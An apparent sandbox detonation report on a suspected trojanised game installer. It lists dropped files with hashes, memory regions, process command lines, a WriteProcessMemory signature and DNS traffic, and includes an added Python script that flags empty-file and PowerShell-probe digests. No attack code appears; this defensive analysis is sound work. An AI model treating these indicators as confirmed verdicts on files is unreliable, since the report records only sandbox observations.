| SHA512 | 3016f721d77206e13e275e7eea1adc95d403feaccf595eacf933940485031e9aac0c29b6f47a9ff5f73b08c354b7b82c72193c83e1ff09d84cb5b9b72b708166 |
C:\Users\Admin\AppData\Local\Temp\nsq617.tmp\7z-out\resources\elevate.exe
| MD5 | 792b92c8ad13c46f27c7ced0810694df |
| SHA1 | d8d449b92de20a57df722df46435ba4553ecc802 |
| SHA256 | 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37 |
| SHA512 | 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40 |
\Users\Admin\AppData\Local\Temp\nsq617.tmp\StdUtils.dll
| MD5 | c6a6e03f77c313b267498515488c5740 |
| SHA1 | 3d49fc2784b9450962ed6b82b46e9c3c957d7c15 |
| SHA256 | b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e |
| SHA512 | 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\datareporting\glean\pending_pings\16d53bea-2f92-4f56-8524-f371b0f7b35c
| MD5 | eab57641146f58264e63e33f3027611e |
| SHA1 | e48aebc85a1749e05b9c968e20b473cc19d6aedb |
| SHA256 | 6be9e323b812bb7da1d0421145ff5f2c5ed2509f1c52d0200fb96859649c979e |
| SHA512 | 5c52bcf1dffc6839d49b8517d5d8784644b64effbdba506b6216b8b94a9f690853c1f65407e0b0c31df39788ff2d7ab0a567b7865b9268a53b699a5f538edda3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\datareporting\glean\pending_pings\45e39272-d6a2-4a07-9815-0c2bd5791881
| MD5 | 12b94d2cca5c8096b2de2cd2ada430f5 |
| SHA1 | e465ad8b3e4fe4ca082756ef2a4b7a418f70dd12 |
| SHA256 | 35017cfff9ccff3e247062208c32dd0e42a337ec48d622f3f302654abf61b03c |
| SHA512 | 0e0e199f0fd9a8f75ece528e05d7bda6c24a25c0fb23159012e77695e532fe7a8a64f3faf0737d08f9a107b8ba023032912b6836b209d127bfadd7a653996925 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 106eda67678a237dc11888862124c6e6 |
| SHA1 | c43fab9a6f3020bf173a1c1caf23a36c06a8af54 |
| SHA256 | 1dc0efae0d5786d7c583bb53004b02a20b9ae23448f011ac3771750dc42f4924 |
| SHA512 | 120d9c366128e0da6a3c98c6a4912ef6c7b85ee219619ca91ab8b196d3b584e2c4278eaa858c6868137b88e90d0f061be9155975ba30bfe55ed14676352b1259 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\prefs.js
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
| MD5 | 6d9f6cb75374bed11d0be548cd248111 |
| SHA1 | 02a1b38b3e2de8a6baf47a997159ff6b96222d81 |
| SHA256 | a08ec37e3507c8f4a5a0f489c3327b550c0f4c65fd98805ed7657d3bc09fc9ea |
| SHA512 | b12272a81e0ac4d7f65c799b1ff5bbe8f56e3767eb6e1231fdb5a1b1013100a3a7952ae251999055dc8a2c8df18b9040346202d8e9d2484be37575d50d86ada4 |
\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\ffmpeg.dll
| MD5 | a185fc67d7a1d74c75cc9aa0eb780ff6 |
| SHA1 | 11383f267a9a2f32e93e603b7f867558c6540886 |
| SHA256 | 1dfa3687e73905e20f7c7ca2a67cb1e39593a0c2f59572c297182ec95acf5582 |
| SHA512 | f48ec514e845c8df479f0b43d80d0af327a4d8708b4ad7cce7f77dcb775ca5bfb0b71a32d4ebbe24785415203b89ef7f7aa00afe2600b1419210e666f758f32c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\prefs-1.js
| MD5 | 4d48e58e289f73f04e4b1e8b7095513b |
| SHA1 | ebc352a0fa977ced525b94c1721befdb1678b253 |
| SHA256 | c234bba2aef1b0e7dd2bbed3c94cbd0546840f5bbec81a029bb2e29ac2365265 |
| SHA512 | 4271dab70a1af856fb60941745489aa4ede2665f49e0006ab8086416c57b77ffc989b8c28ee5024d16cb583ff5559543e8b1ab387498a94e52bb56636def8231 |
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\icudtl.dat
| MD5 | dd5f0209d61cf550f70a3c20e315f5e6 |
| SHA1 | 668da087318c23163f5cbe4cabba505beb98640c |
| SHA256 | 3de6d95a1fffe0678f331dca8d4b7bf29c052c93927f8718180e50e6fec3ab8b |
| SHA512 | 3f4033c77920bfc5bc001234f5590d865e909d6ae3cb81e4c62826842fc506a2dbdc9d900f43327abfc40f75419dc99316c5cd218d1c3e6a7fdc0ca4a7c56e83 |
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\resources\app.asar
| MD5 | 39ca049fd157cf6c7f859c6f15040a58 |
| SHA1 | e5179efd47698feff4cb32d1588143a0cebf5aca |
| SHA256 | d55fcf608a0b378ffb6d959f02bce60db86c00db9ce16aabf80c4f32af01e3e6 |
| SHA512 | 30d4d544c457716ee28b0d1edc0fb0b650eaa5f8e01f72927faddf206dfa26456994b077e8245afd24de08971b091a107d40e6188f5f060fa0f0700123e75c60 |
\Users\Admin\AppData\Local\Temp\842d43bf-bcf8-43bd-9bd1-1956b0aa06cf.tmp.node
| MD5 | 985711a6160ca37f2ba6a36cd8ac1803 |
| SHA1 | 7422a9624d6ac7b90b5aea4bf6be96fb0598091a |
| SHA256 | a5527feff100234ae1a80cabdc63df9123424d2b46d65392b7b0eb67771a5eb9 |
| SHA512 | 3525164a6518a1b18c13c7b8a4bf9add7b553bca0abd8f9585789f86a9e9f5d94a426404700c77cd5b46deee48498b3b6daf1e674b8c1691f275a301da833387 |
\Users\Admin\AppData\Local\Temp\619bb117-e553-48a7-b74c-bee7d062c8c0.tmp.node
| MD5 | d9ca8449dee2f77b3c217c5de0bbc450 |
| SHA1 | d22696acbe8e428f6e70168aff12d202e7e2b9c5 |
| SHA256 | a1ab97d58849bd1baa44140340e5800590bbccc2f022e7bcea7d6837038fc0f2 |
| SHA512 | cc480c1fc8647ceafd70c2f58e397de7c17b1e8b699e9cc3ce6ff81970ab4301f7a54a64abdb5eab37288d24c1682410d18a20d795683f50491042ff5aca91aa |
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\resources.pak
| MD5 | c0ed64642d8d38b44af3093e4035ea0b |
| SHA1 | 5280ca20b73a02f1f1588f98cf3ab3d5546a9f6e |
| SHA256 | 19ff9f9eefede9f34ae9fd3bb2b5578072c74ab573127ee0adc27492ed6fe4ae |
| SHA512 | 364ff8437d18628bea938c7e12d994d5c31a81c42a53dab9ed335e4b9bb09f6c74808d736c4be20de5c50d98f1a2347570f2c5c8b48be3029285d1861c2d74c1 |
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\locales\en-US.pak
| MD5 | b9b44d130e83971c67fb3d35db6cd999 |
| SHA1 | 02ea5d87e441262c2ff3afbb1c72c8c7c90be1e0 |
| SHA256 | 964d63f304bd2ced25de3fd52f941a7b119648e5595bd93a3fd3b967fb455077 |
| SHA512 | 193af1b3b0292f8a6d1a0df686bff9cf7e2687545cf8608324c26262c24915956510f3d47784200d2de7482bd081af6015d9b065a6c6ced6eb525fc4cc5e7b09 |
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
| MD5 | e5e06448407caa4af70aa81693f7e07c |
| SHA1 | 69e3a2114efee971c153cd7a931426965d8111ea |
| SHA256 | 45710fd4e803df7c3bf0b56ba5d99dac8550038f13f228df8115c2c51f83dd68 |
| SHA512 | ca215de342be4c748389ab306c069cb38cc53abdc708ae5642b2e7af41cc139a38078adc37de2f238ed23648c8aaedee27fc7b9d664c6e130f9b4eed98ccf451 |
\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\ffmpeg.dll
| MD5 | a4c214f7b1ba484e25c238564ced92c0 |
| SHA1 | 15c1263db76616fd98b857a50559199b9f9f7739 |
| SHA256 | f4d1602921d75dc2359ea0c950c3744cb710fe2ff7d81d463fb02e8c5bc95ae0 |
| SHA512 | f1b2399e5c0ac16905bbca21cb8fbfb40c2570774452be41130e83967f14764421c0336e63a96b0ca3a922c7ad16df77231075a5873d0b9dbd92b41c677eb5a5 |
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
| MD5 | ad099d0695c6f28f3208bc18a64da289 |
| SHA1 | e0304cb4d0d62e45b6d47d0eafad62fa3869d7ad |
| SHA256 | 2981b1cd4270c9dc42e475ba9e1d4257171e0fea4c1d4e8c98794a2e0bedc3cc |
| SHA512 | 3949403fe8b1ed7313b7a53e683c6a4234d4bf932bc4f7cc9482fa20836d3f52925508f646cdc4141a4eacab6a8273fc5373790fc4305c72c7efd2e864e17274 |
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\vk_swiftshader.dll
| MD5 | 2c10dad0e6a0ba7e152eab6ae8839f79 |
| SHA1 | a5366459941dea8d9e4e2e9e50b285c9ee2cf4e6 |
| SHA256 | fae2f7d465ffb8ff7c63c6874455b6c32bc1dba543bdb813aafbc7916ef11e93 |
| SHA512 | 7683ab87c4ca4b512b18bf8aeb69ce3cb8ee061edf992bf46989de50316c61e2ff8c79bf4289293847d28707e4f8c4c61d560e3ac23861b3219b2c89b5710e66 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\prefs-1.js
| MD5 | 458e5cc6ac43ceb3cf56cd5fb0e2efc1 |
| SHA1 | ed5f2c89ccd8a1f476c4bf89acd4bd2d8afea2cc |
| SHA256 | 25783a0e2283e2d1f86ea6de133996f8031bef68d5bc2b14a04e796af0e4d247 |
| SHA512 | 79b22b74a6203ff43063212a271b6a54bf0399db173c0983bcaa806570daf65b103a49a1a1193e246ebfcc338a78415b873e4c5dd5ca6501b1737fb5adb1c5b4 |
\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\ffmpeg.dll
| MD5 | c301126b110a0db4cab93ba3975c8cd2 |
| SHA1 | cba2d3e188ff1853e1c8c54dca1f1d15979983de |
| SHA256 | b76564e712029f1ba01e571289ec99c259be476cc1ba6a817e24d6dad1701a37 |
| SHA512 | 61af9312d60ab415fffa96ea3060c5ea5eb07b70fc0fe56115c8257ce8b38191bd6fba6a10283a6600af0057fc8095d732a8b924d53b9aace8369effe4b243d5 |
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
| MD5 | 688693c77545621cacb73a28d10f5c19 |
| SHA1 | 3095c66768adef6c2febdc726e33289d137f73f6 |
| SHA256 | 602b0dfd885200b00fbc28acf347ba825e7f62f76895618750f532d0a20c5ecb |
| SHA512 | 65a36afd88eb385a6fdbcde74b36c20f86568c5f755e0d2187659813d4c3c6478e1a13a4b6149859f7628960f9eeb23735b22d58770c79ab97d87b7e3cd40e7f |
\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\vk_swiftshader.dll
| MD5 | f9470175874428cff8b7928b8b14f602 |
| SHA1 | 236033c82cc17742e694418e5bda241e2b9f5dd9 |
| SHA256 | dafdf4d49a7a662259d0eda4f34422624ae4ebb7ad9b377a836714da9314b42d |
| SHA512 | b5074b00dc9481c964a89686948b8daa001e74145cf57172d7b1fb20497b8df6ae0b96b86f9fcc34310056d4881279fc6e4e0c0cbf00633e095d664a4e1505b3 |
\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\libEGL.dll
| MD5 | 5268c9a6badd0c9be82bc98e6d8fa1a0 |
| SHA1 | c59ceff8bd525135db2fc9d4a8471ba55f09441a |
| SHA256 | a1036bd087ffdbe8c25c78ebdc7ea348f08c12001d95c96943e95c00de7183db |
| SHA512 | b3318cecb5832f4725e7316c63c736fc1548561693ba37ff6a62e555596b997489fb3b7645191fa3bdc7393f5fe2f5ba53718bed6349b21efd877afc12b21928 |
\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\libGLESv2.dll
| MD5 | 54608b0788bf7e0b04fcbd45017f2479 |
| SHA1 | f26c4a9be68ac4d178c697ef35f77bb876c0a92b |
| SHA256 | 70e9fc0e085e0b70a2e006e8a75ebdddd41e82d2fc639ea803d7b8e8a4b3f245 |
| SHA512 | 50ca0d623199157e8122fe2a8d191e1104a6b09d10ffe801886ae500cd749a597c897fd2c0d1114cb6fcfa1658315cc418108b98e8b6509d0fd341f3c76dc2d9 |
\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\d3dcompiler_47.dll
| MD5 | 71ad94dec3115bcb8a556685c0134db3 |
| SHA1 | 61723cb2ba6fa87be615d1116820415977ed8dd6 |
| SHA256 | ac879f6b8c10da2d8d3540ee445a9006eea5704981f35d517e33a934acd59ad3 |
| SHA512 | 395684d6714d0589dbfb1c8889055396b0a9b94486640bad7cc1ecf26129e3251db5bf824047af5d447bdee3b751aa8fa901ee94147d826c2d8b204f4a243d2c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 0bf2f7bc3307434de0e9dbe797bb7cf8 |
| SHA1 | 093f03b1bf57876d23036fd13186d72c2a12723f |
| SHA256 | 8ca71867fe146af4901a4f676d1e366f5729345a83ed768a554069c311e51d05 |
| SHA512 | e73d884dabe86c6c6010b970588fc5a398cada87304a6d61691ecbc0836dbc2a50afb47bb6fcb6560636da53e106e4dfdffb38c8df5329e9da0a7316456e62d7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\prefs-1.js
| MD5 | 5e903c0d96c6374dd979f1d54b1075e0 |
| SHA1 | 6a78cf2674273f0ed12da7ee14deab290d1718c8 |
| SHA256 | e392588641fb6641c66a2a023d0c65ccd6c0535c299d191374be53754ec8b419 |
| SHA512 | c4d3c44b61f740a6e549144e8253f3a147f5f2ef72c368dda99346eeb55d28787b793a1f4f89fa7f2ea9418f4e68623b03ae9a6ac33a35fdd76d3d5d81586971 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | d856f5ac7258437330bc1b327c2e903c |
| SHA1 | 14411876065c0c237d6e499ba4a4d07f81934a24 |
| SHA256 | f03dcaf11abf993469f40713403711823b98745e5377422419842dbd8a45e0fc |
| SHA512 | 093a0c508c373bbb6dd4e8be8916264697ec9a0bde11ee27eb8c5afd26b56ff4ec21b6c7966920414469d94602b2e267839962dec2670bccfafd3cf36ec07bd5 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0htfzopy.default-release\cache2\entries\16F4945F921B4C7FB0447CC14BD8649AAAFD9988
| MD5 | cb82d1bc87c37cb0dee34e0338dfa247 |
| SHA1 | bec91f2dc24a4f1ffb86f0a6509b56336255793d |
| SHA256 | ed4cb68c5a31bd9d6c0bd84a6ee430d5b31ed761716abc988dc0ed57e316a6fc |
| SHA512 | ebb313e80cb3a1cfeac5426add8d3f7e4cff266d104b7184188e47dfa9bc49b5f415baefe026861c97781b27dbdf87b6d50740b8bfce3b746a5748ef8ac040e6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | ab3c4432db5fdce973f6b0b6fc166288 |
| SHA1 | 2e801d80501729fbe4326afef818dea008d7b2b5 |
| SHA256 | 35affc911c9f1b6a6e0bacdb9fcec7908545a5c78c5cf8f1f37ca90d1b7a7604 |
| SHA512 | f5821684b34835c142bebf41165b9e633f94817ea7c838a7eec0bb02a2319ed862f682aca463f6e05209485ebc021d7b650c7e077bbc605ebd440512e6c9dcec |
memory/11812-818-0x00007FFD86140000-0x00007FFD86B2C000-memory.dmp
memory/11812-819-0x0000025EE0D10000-0x0000025EE0D20000-memory.dmp
memory/11812-820-0x0000025EE0D10000-0x0000025EE0D20000-memory.dmp
memory/11812-817-0x0000025EE0CD0000-0x0000025EE0CF2000-memory.dmp
memory/11812-823-0x0000025EE0FA0000-0x0000025EE1016000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nn52gymf.kwy.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/11812-844-0x0000025EE0D10000-0x0000025EE0D20000-memory.dmp
memory/11812-845-0x00007FFD86140000-0x00007FFD86B2C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5d574dc518025fad52b7886c1bff0e13 |
| SHA1 | 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7 |
| SHA256 | 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2 |
| SHA512 | 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13 |
memory/8092-854-0x00007FFD86140000-0x00007FFD86B2C000-memory.dmp
memory/8092-855-0x00000178FDE20000-0x00000178FDE30000-memory.dmp
memory/8092-856-0x00000178FDE20000-0x00000178FDE30000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1379f67f98d7623048b018096b5fe6f4 |
| SHA1 | 40521f423f992409e7173f89a5c259cb29559e66 |
| SHA256 | 92381e78bf8cc44497bc5fde361243c2259ba48aa3340507484c298d3a60b04d |
| SHA512 | 37913d2c4777ce6e190d506e4f0f9c8dd64bb90ea55ca92e2a295982284249bba402682750f084772bc86f3732358f1dc4ae290118d773cf8487f09744893ace |
memory/8092-878-0x00000178FDE20000-0x00000178FDE30000-memory.dmp
memory/8092-879-0x00007FFD86140000-0x00007FFD86B2C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 222abf9d6d1375d87e4892aa6b69d447 |
| SHA1 | 8bf79b9208aa821721d72b17c05c51616bdc5cbb |
| SHA256 | 530fa79ce030473d1d1f54ad61bab89862c2d23fa249fc0538562ab686741e52 |
| SHA512 | fc7f68ad67a81f4e6995b8cd124f7dfe680360da1b5b250efdb319d05dc12791ac443c5610857ebd11a75a38e991ea1021017b19ec2623fdf2cae90507145df1 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0htfzopy.default-release\cache2\doomed\493
| MD5 | 89d97365d726e11d2da115db5178dca0 |
| SHA1 | 0f26e7ed43e864f3bfd1784bfd9d727938997021 |
| SHA256 | 669e2ce97f19bfa510448693de5c81816a44d3b86deb470e4fa87e81dc19fe94 |
| SHA512 | ec769b3d8d66849daa208bfc4b553b1dabdb7224056ea8c361015df403bb35ecd1694ba16ef1e844107ca80ebf02377bd6849243b3ca1c99315d6111650d5d73 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 07fa1e0cbb433ec2a9fd6268235e19df |
| SHA1 | 80472ab0a78c76b3c4fcc31d5778c78d49299f8d |
| SHA256 | 65bdfb7e99491177e064cdb45034a7eae71d258699a00a90f991264cb8fd15a4 |
| SHA512 | 79c2edfb12f695be91539e280dec0ab1d09728c27778715a8f7ad1804831057067e2d32cfe026a6837bc99105317724acddae4ab647347381fe44da40f26b5e2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\storage\default\https+++www.wildtangent.com\idb\3619119340leogcaarlof.sqlite
| MD5 | d4923b8b9160853084a0196eab4236ea |
| SHA1 | 95a0175a70549d5da177f774d9c19b8f7ae7ce90 |
| SHA256 | a090a8979a2198c29faf26421a148a92631e0c19fce0024016e69999d8f2832e |
| SHA512 | 727cd88e71c582e38d82ca00f5c21d94bdca45554533fc2e37240bda90f8b24aabca4a3a5bbfe806ee42b84dabd6f1612042ade771741c066614c95b8139200f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\storage\default\https+++www.wildtangent.com\idb\3619119340leogcaarlof.sqlite
| MD5 | ac9b2eeb65ceb57e483331f1f50f20a5 |
| SHA1 | 5534936b9e8b1dcfc3d369cb0da53b0703afd449 |
| SHA256 | 904a1fb37865bb9cb223e12990a61d9ed4272b5442030b69cb4e6eb9c1901cba |
| SHA512 | eed9f6bc1727319f6125d7c77654dd0f7e03fd9dfa3c4a4acc0dd4594e7bb09e672e935cc286910aada005437dc99658738355d2a39566e7619ed3035c03be94 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 40cb4085b5bb8ecd454947c8d09b1355 |
| SHA1 | 4dddc3e8198f052f4c5fb07604dd5a1828a7f7a5 |
| SHA256 | 85bf516acc97bf670024432a29a25c66797ffd29e1287906db010e3c5a34157c |
| SHA512 | 6f31593d4e856590a1449ef3204e3a1f83c566aebcd3ba1c74382141ae3225245782ef7dad43be7397ac64ed542a474e527a11b471f34bbbd9806cacd2c3f932 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 711b4a52982dc1a5452b5ed75affe2ef |
| SHA1 | c7c65ca134eff09391157ac1caa6470d6e5953b0 |
| SHA256 | 87b13e1fb8c770b981346c10e37b4197d1a64980efa55aa68dfc07da45c940c4 |
| SHA512 | d43824b0add2f70ace94dec1156241eef6d12837b77e1ea89d6a1e20e1ff62a789f017a073b070e6e28a778b8e6af192c741a300bbb99fd3a237902995812721 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0htfzopy.default-release\jumpListCache\X2mmvihH0fvI97fUoVttDQ==.ico
| MD5 | 42ed60b3ba4df36716ca7633794b1735 |
| SHA1 | c33aa40eed3608369e964e22c935d640e38aa768 |
| SHA256 | 6574e6e55f56eca704a090bf08d0d4175a93a5353ea08f8722f7c985a39a52c8 |
| SHA512 | 4247460a97a43ce20d536fdd11d534b450b075c3c28cd69fc00c48bdf7de1507edb99bef811d4c61bed10f64e4c788ee4bdc58c7c72d3bd160b9b4bd696e3013 |
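Two of the dropped-file entries above carry digests a reviewer should recognise without any lookup: the Firefox prefs.js entry lists the MD5/SHA1/SHA256/SHA512 of a zero-byte file (d41d8cd9..., da39a3ee..., e3b0c442..., cf83e135...), and the __PSScriptPolicyTest_*.ps1 entry lists the digests of the single byte "1", which is what PowerShell writes into that probe file when it checks AppLocker/WDAC script policy. Neither is sample content. The following is an added example, not part of the sandbox report, that parses this page's Files-table layout (a path line followed by `| ALGO | hex |` rows) and labels each entry from its digests: a known payload, "unknown content", or "inconsistent" when the four values cannot all be digests of one and the same file (a sign of a copy/paste or extraction error). The three embedded entries are constructed from the table above; the path strings are only sample input.

```python
import hashlib
import re

# Constructed excerpt of the report's Files list: three entries copied from the
# page (Firefox prefs.js, PowerShell's __PSScriptPolicyTest file, app.asar).
REPORT_EXCERPT = r"""
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\prefs.js
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nn52gymf.kwy.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\resources\app.asar
| MD5 | 39ca049fd157cf6c7f859c6f15040a58 |
| SHA1 | e5179efd47698feff4cb32d1588143a0cebf5aca |
| SHA256 | d55fcf608a0b378ffb6d959f02bce60db86c00db9ce16aabf80c4f32af01e3e6 |
| SHA512 | 30d4d544c457716ee28b0d1edc0fb0b650eaa5f8e01f72927faddf206dfa26456994b077e8245afd24de08971b091a107d40e6188f5f060fa0f0700123e75c60 |
"""

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")

# Payloads whose digests are worth recognising on sight. The empty file is the
# obvious one; PowerShell writes the single byte "1" into its
# __PSScriptPolicyTest_*.ps1 probe when it tests AppLocker/WDAC script policy.
KNOWN_PAYLOADS = {
    "empty file": b"",
    "PowerShell __PSScriptPolicyTest probe (content '1')": b"1",
}


def digests(data):
    """All four digests the report lists, computed over one payload."""
    return {
        "MD5": hashlib.md5(data).hexdigest(),
        "SHA1": hashlib.sha1(data).hexdigest(),
        "SHA256": hashlib.sha256(data).hexdigest(),
        "SHA512": hashlib.sha512(data).hexdigest(),
    }


KNOWN_DIGESTS = {label: digests(data) for label, data in KNOWN_PAYLOADS.items()}


def parse_files_table(text):
    """Parse 'path line followed by | ALGO | hex |' rows into [(path, {algo: hex})]."""
    entries = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:                      # anything that is not a hash row is a path
            current = (line, {})
            entries.append(current)
            continue
        if current is None:
            raise ValueError("hash row before any path: " + line)
        current[1][m.group(1)] = m.group(2).lower()
    return entries


def classify(hashes):
    """Label one entry from its digests alone.

    Returns the known-payload label when every listed digest belongs to that
    payload, 'inconsistent: ...' when only some of them do (the values then
    cannot all describe one file), 'malformed ...' for a wrong-length digest,
    and 'unknown content' otherwise.
    """
    for algo, value in hashes.items():
        if len(value) != DIGEST_LEN[algo]:
            return "malformed %s digest" % algo
    for label, known in KNOWN_DIGESTS.items():
        hits = [algo for algo, value in hashes.items() if known[algo] == value]
        if hits and len(hits) != len(hashes):
            return "inconsistent: %s match %s, the rest do not" % (", ".join(hits), label)
        if hits:
            return label
    return "unknown content"


def triage(text):
    """Map each path in a Files list to its classification."""
    return {path: classify(hashes) for path, hashes in parse_files_table(text)}


if __name__ == "__main__":
    for path, label in triage(REPORT_EXCERPT).items():
        print("%-100s %s" % (path, label))
```

Entries labelled as a known payload can be dropped from IOC lists outright: a zero-byte prefs.js and the PowerShell policy probe will hash identically on every host and say nothing about this sample.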
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
127s
Max time network
140s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4532 wrote to memory of 3680 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4532 wrote to memory of 3680 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4532 wrote to memory of 3680 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 628
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.238.56.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
